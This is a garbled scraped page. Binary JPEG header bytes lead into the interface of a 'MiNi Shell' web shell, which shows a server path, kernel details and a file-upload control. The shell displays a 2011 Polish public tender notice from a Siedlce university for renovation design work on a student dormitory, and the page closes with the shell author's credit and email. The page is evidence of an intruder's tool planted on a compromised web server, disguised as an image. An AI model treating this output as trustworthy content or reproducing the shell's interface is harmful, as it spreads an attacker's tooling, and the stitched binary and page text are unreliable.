JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111207/321891-N-2011.html

<p class="kh_header"><b>Siedlce: WYKONANIE DOKUMENTACJI PROJEKTOWO - KOSZTORYSOWEJ REMONTU BUDYNKU DOMU STUDENTA UNIWERSYTETU PRZYRODNICZO - HUMANISTYCZNEGO NR 5 PRZY UL. ŻYTNIEJ 17-19 W SIEDLCACH</b><br>
<b>Numer ogłoszenia: 321891 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczo-Humanistyczny w Siedlcach , ul. Konarskiego 2, 08-110 Siedlce, woj. mazowieckie, tel. 25 6442095, faks 25 6442045.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uph.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI PROJEKTOWO - KOSZTORYSOWEJ REMONTU BUDYNKU DOMU STUDENTA UNIWERSYTETU PRZYRODNICZO - HUMANISTYCZNEGO NR 5 PRZY UL. ŻYTNIEJ 17-19 W SIEDLCACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Informacje ogólne
1)	Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej remontu budynku Domu Studenta nr 5 Uniwersytetu Przyrodniczo - Humanistycznego przy ul. Żytniej 17/19 w Siedlcach (oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień CPV: 71220000-6 usługi projektowania architektonicznego).  
2)	Prace remontowe zrealizowane na podstawie dokumentacji projektowo - kosztorysowej mają na celu kompleksowe dostosowanie budynku do funkcji mieszkalnej (dom studenta oraz cztery niezależne mieszkania - po dwa na parterze i 1. piętrze budynku), poprzez nadanie obiektowi właściwych parametrów technicznych, użytkowych i estetycznych.

3)	Dokumentacja projektowa powinna zostać sporządzona z uwzględnieniem konieczności przeprowadzenia robót budowlanych w dwóch etapach, obejmujących remont każdego ze skrzydeł budynku.
3.	Szczegółowy opis przedmiotu zamówienia
1.	Przedmiot zamówienia obejmuje:
1)	wykonanie inwentaryzacji stanu istniejącego budynku;
2)	wykonanie dokumentacji projektowo - kosztorysowej, w zakresie określonym w niniejszej SIWZ;
3)	uzyskanie wszystkich wymaganych przepisami prawa opinii, sprawdzeń, uzgodnień, ekspertyz, badań (w szczególności w zakresie p. poż., bhp, sanitarno-higienicznym itd.), niezbędnych do realizacji przedmiotu zamówienia;
2.	Dokumentacja projektowo - kosztorysowa winna składać się z następujących opracowań (we wszystkich branżach):
1)	dokumentacja projektowa, obejmująca:
a)	projekty budowlane w zakresie uwzględniającym specyfikę robót budowlanych;
b)	projekty wykonawcze;
c)	przedmiary robót;
d)	informację dotyczącą bezpieczeństwa i ochrony zdrowia, w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów
2)	specyfikacje techniczne wykonania i odbioru robót budowlanych;
3)	kosztorysy inwestorskie.
3.	Dokumentacja projektowo - kosztorysowa winna opisywać wykonanie wszystkich robót budowlanych, niezbędnych do realizacji celu określonego w punkcie II.1.2 SIWZ (z wyłączeniem robót elewacyjnych i wymiany okien), w tym w szczególności: 
1)	roboty w branży budowlanej, w tym w szczególności:
a)	remont wejścia do budynku;
b)	wymianę drzwi  wejściowych;
c)	wymianę wewnętrznej stolarki drzwiowej wraz z futrynami (z zastosowaniem systemu master key);
d)	obłożenie wnęk drzwiowych wykładziną elastyczną;
e)	wymianę parapetów wewnętrznych;
f)	odtworzenie ścian działowych w segmentach;
g)	skucie, tynkowanie, gipsowanie i malowanie ścian oraz sufitów;
h)	izolację ścian w łazienkach;
i)	naprawę posadzek w całym budynku, w tym izolację podłóg w łazienkach, wymianę wykładzin na wykładziny podłogowe o wysokiej ścieralności oraz wymianę terakoty;
j)	wymianę glazury w łazienkach i kuchniach;
k)	wymianę balustrad na klatkach schodowych;
l)	naprawę stopni schodowych na klatkach schodowych z obłożeniem wykładziną schodową o wysokiej ścieralności;
m)	założenie listew odbojowych na korytarzach i klatkach schodowych;
n)	zamurowanie drzwi w szachtach technicznych, z założeniem drzwiczek rewizyjnych;
o)	wydzielenie przeciwpożarowe klatek schodowych;
p)	rozbiórkę budynku wózkowni;
q)	wykonanie parkingu w miejscu po wózkowni;
r)	rozbiórkę istniejącego fundamentu po kominie;
s)	naprawę dachu (wymiana pokrycia i obróbek blacharskich, naprawa kominów);
t)	remont piwnic;
2)	roboty w branży elektrycznej, obejmująca wszelkie prace niezbędne do remontu instalacji elektrycznych, w tym w szczególności;
a)	kompleksową wymianę instalacji elektrycznej;
b)	wymianę tablic mieszkaniowych w segmentach i tablic piętrowych z zastosowaniem ochrony przeciwporażeniowej;
c)	kompleksową wymianę osprzętu w całym budynku;
d)	kompleksową wymianę oświetlenia w całym budynku, z uwzględnieniem oświetlenia awaryjnego;
e)	wymianę rozdzielni głównej;
f)	wymianę minikuchni (kuchnia elektryczna, lodówka) w aneksach;
g)	roboty w branży teletechnicznej, w tym w szczególności wykonanie:Systemu Alarmu Pożaru, Dźwiękowego Systemu Ostrzegania, instalacji RTV; instalacji domofonowej (z łącznością zwrotną do portiera); instalacji logicznej w klasie 6A, z wykonaniem punktów logicznych (czytniki kart) przy wejściach do segmentów; dedykowanej instalacji elektrycznej;
h)	wymianę instalacji odgromowej;
3)	roboty w branży sanitarnej, w tym w szczególności:
a)	kompleksową wymianę instalacji wodno - kanalizacyjnej (c. o., c. w. i wod. - kan.); 
b)	wymianę szafek hydrantowych;
c)	wymianę kabin natryskowych i brodzików;
d)	wymianę armatury i ceramiki łazienkowej i kuchennej;
e)	wymianę wszystkich zaworów na kulowe;
f)	wymianę podejść we wszystkich pionach;
g)	wymianę zaworów grzejnikowych na zawory termostatyczne oraz montaż zaworów na powrocie;
h)	wymianę zaworów na pionach grzejnych na kulowe;
i)	wymianę grzejników;
j)	wymianę spustów dachowych;
4.	Dokumentacja projektowo - kosztorysowa winna określać szczegółowo przedmiot zamówienia na potrzeby planowanego postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych zgodnie z ustawą Prawo zamówień publicznych. W szczególności, Zamawiający wymaga, aby Wykonawca określił w dokumentacji parametry oraz właściwości urządzeń i materiałów stosowanych przy wykonaniu prac remontowych z uwzględnieniem zasad wynikających z art. 29 - 30 ustawy Prawo zamówień publicznych (w szczególności bez stosowania znaków towarowych, nazw własnych, patentów czy wskazania pochodzenia materiałów).
5.	Zamawiający wymaga, aby:
1)	dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót były wykonane w sposób określony w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego.
2)	kosztorys inwestorski był wykonany w sposób określony w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym.
6.	Dokumentacja projektowo - kosztorysowa winna być wykonana również zgodnie z innymi niż wymienione w pkt 5 obowiązującymi przepisami prawa (w tym w szczególności ustawą Prawo budowlane, warunkami technicznymi, jakim powinny odpowiadać budynki i ich usytuowanie), w oparciu o właściwe normy, z zachowaniem wymogów wynikających ze sztuki budowlanej. 
7.	Wykonawca zobowiązany jest dostarczyć:
1)	inwentaryzację stanu istniejącego budynku - w wersji drukowanej (1 egz.) i elektronicznej w plikach w formacie .pdf i .dwg (1 egz.).
2)	kompletną dokumentację projektowo - kosztorysową w wersji drukowanej (5 egz.) i elektronicznej w plikach w formacie .pdf i .dwg (1 egz.).
8.	Wykonawca zobowiązany jest do złożenia w trakcie odbioru dokumentacji oświadczenia o kompletności dokumentacji oraz o zgodności kosztorysu inwestorskiego z dokumentacją..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia - jeżeli Wykonawca wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 (dwa) zamówienia, których przedmiotem było wykonanie dokumentacji projektowo - kosztorysowej robót budowlanych w rozumieniu art. 3 pkt 7 ustawy z dnia 7 lipca 1994 r. Prawo budowlane co najmniej w zakresie branży budowlanej, elektrycznej i sanitarnej, o wartości każdego z zamówień nie mniejszej niż 70 tys. zł brutto;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia - jeżeli w wykonaniu zamówienia uczestniczyć będą:
a)jako projektant w branży budowlanej - osoba, która posiada uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno - budowlanej;
b)jako projektant w branży elektrycznej - osoba, która posiada uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
c)jako projektant w branży sanitarnej - osoba, która posiada uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w przypadku zaistnienia okoliczności niezależnych od Wykonawcy, leżących po stronie Zamawiającego (w szczególności długotrwała zwłoka w udzieleniu informacji Wykonawcy, niedostarczenie wymaganych dokumentów) powodujących, iż nie jest możliwe terminowe wykonanie zamówienia, dopuszcza się przedłużenie terminu wykonania zamówienia o okres odpowiadający trwania przeszkody w wykonaniu zamówienia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uph.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia UPH w Siedlcach
ul. Konarskiego 2
08-110 Siedlce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 10:00, miejsce: Sekretariat Ogólny UPH w Siedlcach
ul. Konarskiego 2
08-110 Siedlce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com